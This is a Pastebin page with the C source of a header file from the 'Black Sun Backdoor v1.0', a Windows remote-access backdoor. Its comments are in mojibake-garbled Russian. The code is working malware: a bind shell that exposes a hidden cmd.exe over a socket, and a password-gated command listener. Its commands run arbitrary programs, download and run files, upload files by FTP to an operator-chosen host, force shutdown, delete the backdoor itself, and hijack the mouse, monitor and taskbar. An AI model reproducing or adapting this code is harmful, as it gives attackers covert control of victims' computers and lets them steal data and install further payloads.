Advertisement
FlyFar

src/backdoor.h

May 17th, 2024
548
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 23.06 KB | Cybersecurity | 0 0
 1. /*
 2.  *  ---------------------------------------------------------------------
 3.  *         ____  _            _     _____            
 4.  *        |  _ \| |          | |   / ____|            
 5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
 6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
 7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
 8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
 9.  *                 Black Sun Backdoor v1.0 prebeta        
 10.  *
 11.  *                          (x) Cytech 2007
 12.  *
 13.  *  ---------------------------------------------------------------------
 14.  *  [backdoor.h]
 15.  *      Ìîäóëü ñîñòîÿùèé èç ôóíêöèé áýêäîðà (bindshell è ñâîåãî ñåðâåðà).
 16.  *  ---------------------------------------------------------------------
 17.  */
 18.  
 19.  // ------------------ [ îòñûëêà äàííûõ êëèåíòó ] ------------------ //
 20.  
 21. static DWORD WINAPI ClientSend(char *Data, SOCKET zsock)
 22. {
 23.     send(zsock, Data, lstrlen(Data),0);
 24.     closesocket(zsock);
 25.     fZeroMemory (&Data, sizeof(Data));
 26.     return 0;
 27. }
 28.  
 29. // ------------------ [ bindshell áýêäîð ] ------------------ //
 30.  
 31. // ýòè äâå ô-èè ÿ ïîçàèìñòâîâàë ó el-//0x48k èç el-small-backdoor. ñòàðûé êîä çàêîììåíòèðîâàí,
 32. // ò.ê îí æóòêî ãëþ÷íûé (ðàáîòàåò íî ëó÷øå ýòî íå þçàòü ))), à el êàê âñåãäà îòëè÷èëñÿ
 33. // ñòàáèëüíîñòüþ è ãðàììîòíîé ðåàëèçàöèåé: ìîæíî ðàáîòàòü ïðÿìî ÷åðåç telnet (èçâåñòíî, ÷òî telnet
 34. // ïîñûëàåò âñåãî ïî îäíîìó áàéòó (òî åñòü ñèìâîëó) íà ñîêåò, áýêäîð èõ "ñêëàäûâàåò" äî ïåðåíîñà
 35. // ñòðîêè è òîëüêî ïîòîì âûïîëíÿåò, â ìîåì æå ñëó÷àå telnet íå ïîäõîäèë âîîùáå,
 36. // ïîýòîìó ïðèõîäèëîñü þçàòü òóëçó netcat (win32/nix)). Îò ñåáÿ äîáàâèë òîëüêî ïîëó÷åíèå ïóòè äî
 37. // êîììàíäíîãî èíòåðïðåòàòîðà ÷åðåç ïåðåìåííóþ ñðåäû "ComSpec".
 38. //
 39. // bindshell-backdoor ripped from el-small-backdoor by el- // 0x48k
 40. // el-site.narod.ru || hellknights.void.ru
 41.  
 42. /*
 43. ================
 44. MakeShell
 45. ================
 46. */
 47. static DWORD WINAPI MakeShell( LPVOID lpParam )
 48. {
 49.     DWORD               dwLen;
 50.     int                 nTimeOut;
 51.     int                 iTemp;
 52.     SOCKET              sock;
 53.     HANDLE              cstdin;
 54.     HANDLE              cstdout;
 55.     HANDLE              rstdout;
 56.     HANDLE              wstdin;
 57.     unsigned long       lTotal;
 58.     STARTUPINFO         si;
 59.     SECURITY_ATTRIBUTES sa;
 60.     PROCESS_INFORMATION pi;
 61.     char                szTemp[ MAX_PATH ];
 62.     static DWORD        dwTemp;
 63.     char                cmd[256];
 64.  
 65.     sock = *( ( SOCKET * )lpParam );
 66.     sa.lpSecurityDescriptor     = NULL;
 67.     sa.nLength                  = sizeof( SECURITY_ATTRIBUTES );
 68.     sa.bInheritHandle           = TRUE;
 69.    
 70.     if (!CreatePipe(&cstdin, &wstdin, &sa, 0))
 71.     {
 72.         return 0;
 73.     }
 74.    
 75.     if (!CreatePipe(&rstdout, &cstdout, &sa, 0))
 76.     {
 77.         return 0;
 78.     }
 79.    
 80.     GetStartupInfo(&si);
 81.     si.dwFlags      = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
 82.     si.wShowWindow  = SW_HIDE;
 83.     si.hStdOutput   = cstdout;
 84.     si.hStdError    = cstdout;
 85.     si.hStdInput    = cstdin;
 86.  
 87.     GetEnvironmentVariable(COMSPEC, cmd, 256);
 88.  
 89.     if ( !CreateProcess(0, cmd, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, &si, &pi ))
 90.     {
 91.         return 0;
 92.     }
 93.    
 94.     while(GetExitCodeProcess(pi.hProcess, &dwTemp) && (dwTemp == STILL_ACTIVE))
 95.     {
 96.         if (nTimeOut >= 10000)
 97.         {
 98.             break;
 99.         }
 100.         if (PeekNamedPipe(rstdout, szTemp, 1, &dwTemp, &lTotal, 0) && dwTemp)
 101.         {
 102.             for (iTemp = 0; iTemp < lTotal; iTemp += MAX_PATH - 1)
 103.             {
 104.                 fMemSet( szTemp, sizeof( szTemp ), 0x00 );
 105.                 ReadFile( rstdout, szTemp, MAX_PATH - 1, &dwTemp, 0 );
 106.                 send( sock, szTemp, dwTemp, 0 );
 107.             }
 108.         }
 109.         if (!ioctlsocket(sock, FIONREAD , &dwTemp) && dwTemp)
 110.         {
 111.             nTimeOut = 0;
 112.             fMemSet(szTemp, sizeof(szTemp), 0x00);
 113.             dwLen = recv(sock, szTemp, 1, 0);
 114.             if (dwLen <= 0)
 115.             {
 116.                 break;
 117.             }
 118.             if (*szTemp == '\x0A')
 119.             {
 120.                 WriteFile(wstdin, "\x0D", 1, &dwTemp, 0);
 121.             }
 122.             WriteFile(wstdin, szTemp, 1, &dwTemp, 0);
 123.         }
 124.         nTimeOut ++;
 125.         Sleep(1);
 126.     }
 127.  
 128.     CloseHandle(cstdin);
 129.     CloseHandle(wstdin);
 130.     CloseHandle(cstdout);
 131.     CloseHandle(rstdout);
 132.     closesocket(sock );
 133.     TerminateProcess(pi.hProcess, 0);
 134.     ExitThread(0);
 135.  
 136.     return 0;
 137. }
 138.  
 139.  
 140. /*
 141. ================
 142. InitShell
 143. ================
 144. */
 145. static DWORD WINAPI InitShell(short port)
 146. {
 147.     DWORD               dwThrId;
 148.     static SOCKET       sock;
 149.     static SOCKET       csock;
 150.     struct sockaddr_in  sin;
 151.  
 152.     sock = socket(AF_INET, SOCK_STREAM, 0);
 153.         if (sock != INVALID_SOCKET)
 154.         {
 155.             sin.sin_family = AF_INET;
 156.             sin.sin_port = htons(port);
 157.             sin.sin_addr.S_un.S_addr = INADDR_ANY;
 158.             fMemSet(&( sin.sin_zero ), 8, 0x00);
 159.             if (bind(sock, (struct sockaddr*) &sin, sizeof(sin)) == 0)
 160.             {
 161.                 if (listen(sock, 0x100) != SOCKET_ERROR)
 162.                 {
 163.                     while((csock = accept(sock, 0, 0)))
 164.                     {
 165.                         CreateThread(0, 0, MakeShell, (LPVOID)&csock, 0, &dwThrId);
 166.                     }
 167.                 }
 168.             }
 169.             closesocket(sock);
 170.         }
 171.     return TRUE;
 172. }
 173.  
 174. /*
 175.  *  ------------
 176.  *  old-code:
 177.  *  ------------
 178.  *  static DWORD WINAPI BackdoorBindCMD(short port)
 179.  *  {
 180.  *      HANDLE Read1,Write1,Read2,Write2;
 181.  *      SOCKET servsock, clientsock;            
 182.  *      SECURITY_ATTRIBUTES secu = {
 183.  *                                   (DWORD) sizeof (SECURITY_ATTRIBUTES),
 184.  *                                    NULL,
 185.  *                                    TRUE
 186.  *                                 };
 187.  *      STARTUPINFO starti;              
 188.  *      PROCESS_INFORMATION pi;          
 189.  *      SOCKADDR_IN sin;                        
 190.  *      // WORD wVersionRequested = MAKEWORD (2,0);
 191.  *      int count =0;
 192.  *  
 193.  *      int err;
 194.  *      char buffer[1024], cmd[256],
 195.  *  
 196.  *      lpNumberOfBytesRead = GetEnvironmentVariable("ComSpec", cmd, 256);
 197.  *     
 198.  *      InitWinSock2API();
 199.  *      // err = WSAStartup(wVersionRequested, &wsadata);
 200.  *  
 201.  *          sin.sin_family = AF_INET;
 202.  *          sin.sin_addr.s_addr=0;
 203.  *          sin.sin_port = htons(port);
 204.  *          err = sizeof (sin);
 205.  *  
 206.  *      servsock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
 207.  *      bind (servsock, (struct sockaddr *)&sin, err);    
 208.  *      listen (servsock, SOMAXCONN);  
 209.  *  
 210.  *      clientsock = accept (servsock, (struct sockaddr *)&sin, &err);
 211.  *  
 212.  *      if (clientsock == INVALID_SOCKET)
 213.  *      {
 214.  *          ExitThread (0);
 215.  *      }
 216.  *  
 217.  *      CreatePipe(&Read1,&Write1,&secu,0);  
 218.  *      CreatePipe(&Read2,&Write2,&secu,0);  
 219.  *  
 220.  *      ZeroMemory (&starti,sizeof (starti));
 221.  *      ZeroMemory (&pi,sizeof (pi));
 222.  *  
 223.  *      starti.cb=sizeof (STARTUPINFO);        
 224.  *      starti.dwFlags=STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
 225.  *      starti.wShowWindow=SW_HIDE;  
 226.  *      starti.hStdInput=Read2;    
 227.  *      starti.hStdOutput=Write1;
 228.  *      starti.hStdError=Write1;
 229.  *     
 230.  *      err = CreateProcess(NULL,cmd,&secu,&secu,TRUE,0,NULL,NULL,&starti,&pi);
 231.  *  
 232.  *      while (clientsock!=SOCKET_ERROR)
 233.  *      {
 234.  *           Sleep (100);
 235.  *           ZeroMemory (buffer,1024);
 236.  *           PeekNamedPipe(Read1,NULL,0,NULL,&lpNumberOfBytesRead,NULL);
 237.  *       
 238.  *          while (lpNumberOfBytesRead)
 239.  *          {                      
 240.  *              Sleep (200);
 241.  *              err = ReadFile(Read1,buffer,1024,&lpNumberOfBytesRead,NULL);
 242.  *              if (!err) break;
 243.  *              else send (clientsock,buffer,lpNumberOfBytesRead,0);
 244.  *              PeekNamedPipe(Read1,NULL,0,NULL,&lpNumberOfBytesRead,NULL);
 245.  *          }
 246.  *              Sleep (200);
 247.  *              err = recv (clientsock,buffer,1024,0);
 248.  *          if(clientsock == 0)
 249.  *          {
 250.  *              count++;
 251.  *              if (count >1)
 252.  *              break;
 253.  *          }
 254.  *                                 
 255.  *          if (!strstr (buffer,"exit")==0)
 256.  *          {
 257.  *              ExitProcess (0);
 258.  *              closesocket (servsock);
 259.  *              closesocket (clientsock);
 260.  *              break;
 261.  *              return 0;
 262.  *          }
 263.  *          else
 264.  *              WriteFile(Write2,buffer,err,&lpNumberOfBytesRead,0);
 265.  *      }
 266.  *      
 267.  *      TerminateProcess(pi.hProcess,0);
 268.  *      return 0;
 269.  *  }
 270.  */
 271.  
 272. // ------------------ [ ïîëó÷íèå äàííûõ îò êëèåíòà è èõ îáðàáîòêà ] ------------------ //
 273.  
 274. static DWORD WINAPI Backdoor_Recv(LPVOID lpParam)
 275. {
 276.     SOCKET  sock = (SOCKET)lpParam;
 277.     char  recvbuffer[1024];
 278.     int  ret, freq, times, rand1, rand2;
 279.     HANDLE hSelfDeleteThread;
 280.  
 281.             //---- [ ïîëó÷àåì äàííûå îò êëèåíòà ] ----//
 282.     while(1)
 283.     {
 284.     fZeroMemory (&recvbuffer, sizeof(recvbuffer));
 285.  
 286.        ret = recv(sock, recvbuffer, 1024, 0);
 287.        if (ret == SOCKET_ERROR) break;
 288.        else
 289.        {
 290.          if(lstrlen(recvbuffer) > 0)
 291.          {
 292.          
 293.          // ïàðñåð êîìàíä ïî ðàçäåëèòåëþ ""  
 294.          // Âîò ôîðìàò êîìàíäû:
 295.          //
 296.          // [LOGIN:PASSWORD][COMMAND][ARGUMENT1][ARGUMENT2][ARGUMENT3].....
 297.          //
 298.          // Êàê âèäíî ðàçäåëèòåëåì êîìàíä ÿâëÿåòñÿ ñèìâîë .
 299.          // òàì æå âû ìîæåòå èçìåíèòü ðàçäåëèòåëü êîìàíä, åñëè ýòî íåîáõîäèìî (íå çàáóäüòå òîãäà è â admin.php)
 300.          //     [LOGIN:PASSWORD]    --  ëîãèí:ïàðîëü (íàïðèìåð, cytech:cytech, óêàçûâàþòñÿ â conf.h (AUTH))
 301.          //     [COMMAND]           --  êîìàíäà (íàïðèìåð, bindshell)
 302.          //     [ARGUMENT1]         --  1ûé àðãóìåíò êîìàíäû (â ñëó÷àå ñ binshell, íàïðèìåð, 31337)
 303.          // Ê ïðèìåðó, êîìàíäà bindshell 31337 âûãëÿäèò ïðè îòïðàâêå òàê (ëîãèí è ïàðîëü - cytech;cytech):
 304.          //     cytech:cytechbindshell31337
 305.          // Ìîæåòå ñìåëî ïèñàòü êëèåíò :)
 306.  
 307.             char * array[1024];
 308.             char * t = strtok(recvbuffer,"");
 309.             int i; int portint;
 310.             for(i = 0; t; t = strtok(NULL,""), i++){ array[i] = t; }
 311.            
 312.         if (lstrcmp(array[0], AUTH)==0)
 313.         {
 314.  
 315.                //---------------------- [ êîìàíäà: messagebox ] -----------------//
 316.                if (lstrcmp(array[1], "msgbox")==0)
 317.                {
 318.                         char * msg = array[2];
 319.                         char * title = array[3];                       
 320.                         MessageBox(0,msg,title,0);
 321.                         ClientSend(MSG_MSGBOX, sock);
 322.                }
 323.                //---------------------- [ êîìàíäà: about ] -----------------//
 324.                else if(lstrcmp(array[1], "version")==0)
 325.                {
 326.                     ClientSend(VERSION, sock);
 327.                }
 328.                //---------------------- [ êîìàíäà: execute command ] -----------------//
 329.                else if (lstrcmp(array[1], "cmd")==0)
 330.                {
 331.                     char * cmdres = ExecuteCMD(array[2]);
 332.                     ClientSend(cmdres, sock);
 333.                }
 334.                //-----------------------[ êîìàíäà: bindshell?port ]----------------------//
 335.                else if (lstrcmp(array[1], "bindshell")==0)
 336.                {
 337.                     StartThread(InitShell, (short)atoi(array[2]));             
 338.                     ClientSend(MSG_BINDSH, sock);
 339.                }
 340.                //---------------------- [ êîìàíäà: exitprocess ] -----------------//
 341.                else if(lstrcmp(array[1], "exitprocess")==0)
 342.                {
 343.                     ClientSend(MSG_EXITPROC, sock);
 344.                     ExitProcess(0);
 345.                }
 346.                //---------------------- [ êîìàíäà: killmyself ] -----------------//
 347.                else if(lstrcmp(array[1], "killmyself")==0)
 348.                {
 349.                 if(lstrcmp(array[2], AUTH)==0)
 350.                 {
 351.                     ClientSend(MSG_KILLSELF, sock);
 352.                     AddSelfToRun("killmyself");
 353.                     hSelfDeleteThread = StartThread(DeleteSelfFirstTime, "delself");
 354.                     ExitProcess(0);
 355.                 } else { ClientSend(MSG_AUTHFAILED, sock); }
 356.                }
 357.                //---------------------- [ êîìàíäà: download ] -----------------//
 358.                else if (lstrcmp(array[1], "download")==0)
 359.                {
 360.                     __try
 361.                     {
 362.                         HRESULT hUdtf = URLDownloadToFile(NULL, array[2], array[3], 0, NULL);
 363.                         if(hUdtf == S_OK)
 364.                         {
 365.                             ClientSend(MSG_LOADER_OK, sock);
 366.                         }
 367.                         else ClientSend(MSG_LOADER_ERROR, sock);
 368.                     }
 369.                     __except(EXCEPTION_EXECUTE_HANDLER)
 370.                     {
 371.                         ClientSend(MSG_LOADER_SEH, sock);
 372.                     }
 373.                }
 374.                //---------------------- [ êîìàíäà: exec?hide/show ] -----------------//
 375.                else if (lstrcmp(array[1], "exec")==0)
 376.                {
 377.                     if(lstrcmp(array[2], "hide")==0)
 378.                     {
 379.                       if(WinExec(array[3], SW_HIDE) > 32)
 380.                       {
 381.                         ClientSend(MSG_EXECHIDE, sock);
 382.                       }
 383.                       else ClientSend(MSG_EXECERROR, sock);
 384.                     }
 385.                     else if(lstrcmp(array[2], "show")==0)
 386.                     {
 387.                         if(WinExec(array[3], SW_SHOW) > 32)
 388.                         {
 389.                             ClientSend(MSG_EXECSHOW, sock);
 390.                         } else ClientSend(MSG_EXECERROR, sock);
 391.                     }
 392.               }
 393.               //---------------------- [ êîìàíäà: ftp_upload ] -----------------//
 394.               else if (lstrcmp(array[1], "ftp_upload")==0)
 395.               {
 396.                     HINTERNET inet, inet2;
 397.                     BOOL connected;
 398.                     inet = InternetOpen(FTP_UPLOAD_CLIENT, INTERNET_OPEN_TYPE_DIRECT, "", "", 0);
 399.                     portint = atoi(array[3]);
 400.                     inet2 = InternetConnect(inet,array[2],(short)portint,array[4],array[5],INTERNET_SERVICE_FTP, 0,0);
 401.                    
 402.                     if(inet2)
 403.                     {
 404.                         connected = TRUE;
 405.                     }
 406.                     else ClientSend(MSG_CONNECTERROR, sock);
 407.                    
 408.                     if(connected)
 409.                     {
 410.                         FtpPutFile(inet2, array[6],array[7], 0,0);
 411.                         ClientSend(MSG_FTPUPLOAD, sock);
 412.                     }
 413.  
 414.               }
 415.              //---------------------- [  êîìàíäà: power?logoff/shutdown/reboot/sleep/stand ] -----------------//
 416.              else if (lstrcmp(array[1], "power") == 0)
 417.              {
 418.                if (SetPrivilege("SeShutdownPrivilege", TRUE))
 419.                {
 420.          
 421.                   if (lstrcmp(array[2], "logoff")==0)
 422.                   {
 423.                     ExitWindowsEx(EWX_LOGOFF,0);
 424.                     ClientSend(MSG_LOGOFF, sock);
 425.                   }
 426.                   else if (lstrcmp(array[2], "shutdown")==0)
 427.                   {
 428.                     ExitWindowsEx(EWX_SHUTDOWN,0);
 429.                     ClientSend(MSG_SHUTDOWN, sock);
 430.                   }
 431.                   else if (lstrcmp(array[2], "reboot")==0)
 432.                   {
 433.                     ExitWindowsEx(EWX_REBOOT,0);
 434.                     ClientSend(MSG_REBOOT, sock);
 435.                   }
 436.                   else if (lstrcmp(array[2], "stand")==0)
 437.                   {
 438.                     SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_SCREENSAVE,1);
 439.                     ClientSend(MSG_STAND, sock);
 440.                   }
 441.                   else if (lstrcmp(array[2], "sleep")==0)
 442.                   {
 443.                     SetSystemPowerState(TRUE, TRUE);
 444.                     ClientSend(MSG_SLEEP, sock);
 445.                   } else {
 446.                             ClientSend(MSG_UNKNOWNARG, sock);
 447.                          }
 448.                          
 449.                 } else  {
 450.                             ClientSend(MSG_SHUTDOWNPRIV, sock);
 451.                         }
 452.              }
 453.  
 454.               //---------------------- [ êîìàíäà: cdrom?open/close ] -----------------//
 455.               else if (lstrcmp(array[1], "cdrom")==0)
 456.               {
 457.                         if(lstrcmp(array[2], "open")==0)
 458.                         {
 459.                             mciSendString("Set cdaudio door open wait", NULL, 0, NULL);
 460.                             ClientSend(MSG_CDROMOPENED, sock);
 461.                         }
 462.                         else if(lstrcmp(array[2], "close")==0)
 463.                         {
 464.                             mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
 465.                             ClientSend(MSG_CDROMCLOSED, sock);
 466.                         }
 467.                         else ClientSend(MSG_UNKNOWNARG, sock);
 468.               }
 469.               //---------------------- [ êîìàíäà: mouse?swap/unswap ] -----------------//
 470.               else if (lstrcmp(array[1], "mouse")==0)
 471.               {
 472.                         if(lstrcmp(array[2], "swap")==0)
 473.                         {
 474.                             SwapMouseButton(TRUE);
 475.                             ClientSend(MSG_SWAPMOUSE, sock);
 476.                         }
 477.                         else if(lstrcmp(array[2], "unswap")==0)
 478.                         {
 479.                             SwapMouseButton(FALSE);
 480.                             ClientSend(MSG_UNSWAPMOUSE, sock);
 481.                         }
 482.                         else
 483.                         {
 484.                             ClientSend(MSG_UNKNOWNARG, sock);
 485.                         }
 486.               }
 487.               //---------------------- [ êîìàíäà: set_wall_bmp ] -----------------//
 488.               else if (lstrcmp(array[1], "set_wall_bmp")==0)
 489.               {
 490.                         char * PicName = array[2];
 491.                         SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PicName, SPIF_SENDCHANGE);
 492.                         ClientSend(MSG_WALLPSET, sock);
 493.               }
 494.               //---------------------- [ êîìàíäà: monitor?on/off ] -----------------//
 495.               else if (lstrcmp(array[1], "monitor")==0)
 496.               {
 497.                         if(lstrcmp(array[2], "on")==0)
 498.                         {
 499.                             SendMessage(HWND_BROADCAST,WM_SYSCOMMAND,SC_MONITORPOWER,-1);
 500.                             ClientSend(MSG_MONON, sock);
 501.                         }
 502.                         else if(lstrcmp(array[2], "off")==0)
 503.                         {
 504.                             SendMessage(HWND_BROADCAST,WM_SYSCOMMAND,SC_MONITORPOWER, 2);
 505.                             ClientSend(MSG_MONOFF, sock);
 506.                         }
 507.                         else ClientSend(MSG_UNKNOWNARG, sock);
 508.               }
 509.               //---------------------- [ êîìàíäà: crazy_mouse ] -----------------//
 510.               else if (lstrcmp(array[1], "crazy_mouse")==0)
 511.               {
 512.                     freq = atoi(array[2]);
 513.                     times = atoi(array[3]);
 514.                     for (i = 0; i < times; i++)
 515.                     {
 516.                         SYSTEMTIME time; GetSystemTime(&time);
 517.                         srand(time.wSecond);
 518.                         rand1 = ((rand() % 1024) + 1);
 519.                         rand2 = ((rand() % 1024) + 1);
 520.                         SetCursorPos(rand1,rand2);
 521.                         Sleep(freq);
 522.                         ClientSend(MSG_DONE, sock);
 523.                     }
 524.                 }
 525.               //---------------------- [ êîìàíäà: keyboard ] -----------------//
 526.               else if (lstrcmp(array[1], "keyboard")==0)
 527.               {
 528.                     if (lstrcmp(array[2], "numlock_on")==0)  
 529.                     {
 530.                         keybd_event(VK_NUMLOCK,0,0,0); keybd_event(VK_NUMLOCK,0,KEYEVENTF_KEYUP,0);
 531.                         ClientSend(MSG_DONE, sock);
 532.                     }
 533.                     else if (lstrcmp(array[2], "numlock_off")==0)
 534.                     {
 535.                         keybd_event(VK_NUMLOCK,0,0,1);
 536.                         keybd_event(VK_NUMLOCK,0,KEYEVENTF_KEYUP,0);
 537.                         ClientSend(MSG_DONE, sock);
 538.                     }
 539.                     else if (lstrcmp(array[2], "capslock_on")==0)
 540.                     {
 541.                         keybd_event(VK_CAPITAL,0,0,0);
 542.                         keybd_event(VK_CAPITAL,0,KEYEVENTF_KEYUP,0);
 543.                         ClientSend(MSG_DONE, sock);
 544.                     }
 545.                     else if (lstrcmp(array[2], "capslock_off")==0)
 546.                     {
 547.                         keybd_event(VK_CAPITAL,0,0,1);
 548.                         keybd_event(VK_CAPITAL,0,KEYEVENTF_KEYUP,0);
 549.                         ClientSend(MSG_DONE, sock);
 550.                     }
 551.                     else if (lstrcmp(array[2], "scrolllock_on")==0)
 552.                     {
 553.                         keybd_event(VK_SCROLL,0,0,0);
 554.                         keybd_event(VK_SCROLL,0,KEYEVENTF_KEYUP,0);
 555.                         ClientSend(MSG_DONE, sock);
 556.                     }
 557.                     else if (lstrcmp(array[2], "scrolllock_off")==0)
 558.                     {
 559.                         keybd_event(VK_SCROLL,0,0,1);
 560.                         keybd_event(VK_SCROLL,0,KEYEVENTF_KEYUP,0);
 561.                         ClientSend(MSG_DONE, sock);
 562.                     } else {
 563.                             ClientSend(MSG_UNKNOWNARG, sock);
 564.                            }
 565.               }
 566.              //---------------------- [ êîìàíäà: funwindows ] -----------------//
 567.              else if (lstrcmp(array[1], "funwindows") == 0)
 568.              {
 569.                 HWND     hWndc1,    hWndc2,     hWndc3,     hWndc4,
 570.                          hWndc5,    hWndc6,     hWndc7,     hWndc8,     hWndc9;
 571.                 // óæàñ :D
 572.                  hWndc1 = FindWindow("Shell_TrayWnd", NULL);
 573.                  hWndc2 = FindWindowEx(hWndc1, NULL, "Button", "start");
 574.                  hWndc3 = FindWindowEx(hWndc2, NULL, "ReBarWindow32", NULL);
 575.                  hWndc4 = FindWindowEx(hWndc3, NULL, "ToolbarWindow32", "Quick Launch");
 576.                  hWndc5 = FindWindowEx(hWndc3, NULL, "MSTaskSwWClass", NULL);
 577.                  hWndc6 = FindWindowEx(hWndc1, NULL, "TrayNotifyWnd", NULL);
 578.                  hWndc7 = FindWindowEx(hWndc6, NULL, "Button", NULL);
 579.                  hWndc8 = FindWindowEx(hWndc6, NULL, "SysPager", NULL);
 580.                  hWndc9 = FindWindowEx(hWndc6, NULL, "TrayClockWClass", NULL);
 581.  
 582.                 if (strcmp(array[2], "hide_panel")==0)
 583.                 { SetWindowStatus(hWndc1, "hide"); ClientSend(MSG_DONE, sock); }
 584.                 else if (lstrcmp(array[2], "show_panel")==0)
 585.                 { SetWindowStatus(hWndc1, "show"); ClientSend(MSG_DONE, sock); }
 586.                 else if (lstrcmp(array[2], "hide_start")==0)
 587.                 { SetWindowStatus(hWndc2, "hide"); ClientSend(MSG_DONE, sock); }
 588.                 else if (lstrcmp(array[2], "show_start")==0)
 589.                 { SetWindowStatus(hWndc2, "show"); ClientSend(MSG_DONE, sock); }
 590.                 else if (lstrcmp(array[2], "hide_rebar")==0)
 591.                 {SetWindowStatus(hWndc3, "hide"); ClientSend(MSG_DONE, sock); }
 592.                 else if (lstrcmp(array[2], "show_rebar")==0)
 593.                 { SetWindowStatus(hWndc3, "show"); ClientSend(MSG_DONE, sock); }
 594.                 else if (lstrcmp(array[2], "hide_quicklaunch")==0)
 595.                 { SetWindowStatus(hWndc4, "hide"); ClientSend(MSG_DONE, sock); }
 596.                 else if (lstrcmp(array[2], "show_quicklaunch")==0)
 597.                 { SetWindowStatus(hWndc4, "show"); ClientSend(MSG_DONE, sock); }
 598.                 else if (lstrcmp(array[2], "hide_tasksw")==0)
 599.                 { SetWindowStatus(hWndc5, "hide"); ClientSend(MSG_DONE, sock); }
 600.                 else if (lstrcmp(array[2], "show_tasksw")==0)
 601.                 { SetWindowStatus(hWndc5, "show"); ClientSend(MSG_DONE, sock); }
 602.                 else if (lstrcmp(array[2], "hide_trey")==0)
 603.                 { SetWindowStatus(hWndc6, "hide"); ClientSend(MSG_DONE, sock); }
 604.                 else if (lstrcmp(array[2], "show_trey")==0)
 605.                 { SetWindowStatus(hWndc6, "show"); ClientSend(MSG_DONE, sock); }
 606.                 else if (lstrcmp(array[2], "hide_treybutton")==0)
 607.                 { SetWindowStatus(hWndc7, "hide"); ClientSend(MSG_DONE, sock); }
 608.                 else if (lstrcmp(array[2], "show_treybutton")==0)
 609.                 { SetWindowStatus(hWndc7, "hide"); ClientSend(MSG_DONE, sock); }
 610.                 else if (lstrcmp(array[2], "hide_treyicon")==0)
 611.                 { SetWindowStatus(hWndc8, "hide"); ClientSend(MSG_DONE, sock); }
 612.                 else if (lstrcmp(array[2], "show_treyicon")==0)
 613.                 { SetWindowStatus(hWndc8, "show"); ClientSend(MSG_DONE, sock); }
 614.                 else if (lstrcmp(array[2], "hide_time")==0)
 615.                 { SetWindowStatus(hWndc9, "hide"); ClientSend(MSG_DONE, sock); }
 616.                 else if (lstrcmp(array[2], "show_time")==0)
 617.                 { SetWindowStatus(hWndc9, "show"); ClientSend(MSG_DONE, sock); }  
 618.                 else    {   ClientSend(MSG_UNKNOWNARG, sock);   }
 619.              }
 620.              /* [ çäåñü ìîæåò áûòü âàøà íîâàÿ êîìàíäà, ïðèìåð: ]
 621.               *
 622.               * else if (lstrcmp(array[1], "command_rtfm") == 0)
 623.              * {
 624.               *   MessageBox(0, array[2], "â array[2] õðàíèòñÿ 1ûé àðãóìåíò êîìàíäû", 0);
 625.               *   ClientSend("\n òåêñò îòñûëàåìûé êëèåíòó \n", sock);
 626.               * }
 627.               * îòðïðàâèâ êîìàíäà command_rtfmcytech
 628.               * âûëåçèò ñîîòâåòñòâóþùèé messagebox.
 629.               */
 630.              
 631.              //---------------------- [ êîìàíäà íå ïîääåðæèâàåòñÿ ] -----------------//
 632.                 else {
 633.                             ClientSend(MSG_UNKNOWNCMD, sock);
 634.                      }  
 635.              //------------------ [ â àâòîðèçàöèè îòêàçàíî ] ----------------//
 636.            } else {
 637.                         ClientSend(MSG_AUTHFAILED, sock);
 638.                   }  
 639.           }
 640.       fZeroMemory (&recvbuffer, sizeof(recvbuffer));
 641.  
 642.       }
 643.     }
 644.     return 0;
 645. }
 646.  
 647. // ------------------ [ ñëóøàåì ïîðò è ïîäêëþ÷àåì êëèåíòà ] ------------------ //
 648.  
 649. static DWORD WINAPI Backdoor_Listen(short port)
 650. {
 651.       SOCKET server, client;
 652.       SOCKADDR_IN localaddr, clientaddr;
 653.       HANDLE hThread;
 654.       int clientSize;
 655.       clientSize = sizeof(clientaddr);
 656.      
 657.       // ñîçäàåì ñîêåò, çàïîëíÿåì ñòðóêòóðó, ñòàâèì íà ïðîñëóøêó. êàê îáû÷íî )
 658.       server = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
 659.      
 660.       localaddr.sin_addr.s_addr = htonl(INADDR_ANY);
 661.       localaddr.sin_family = AF_INET;
 662.       localaddr.sin_port = htons(port);
 663.      
 664.       bind(server, (struct sockaddr *)&localaddr, sizeof(localaddr));
 665.       listen(server, SOMAXCONN);
 666.  
 667.  
 668.        while(1)
 669.        {
 670.             // åñëè êëèåíò ïîäêëþ÷èëñÿ, òî ñîçäàåì ïîòîê "ïåðåäà÷è óïðàâëåíèÿ" ô-èè Backdoor_Recv
 671.             // (ïîëó÷åíèå äàííûõ îò êëèåíòà è èõ îáðàáîòêà, à òàêæå îâòåò íà íèõ)
 672.            
 673.             client = accept(server, (struct sockaddr *)&clientaddr, &clientSize);
 674.             hThread = StartThread(Backdoor_Recv,(LPVOID)client);
 675.             CloseHandle(hThread);
 676.        }
 677.  
 678.        closesocket(server);
 679.  
 680.   return 0;
 681. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement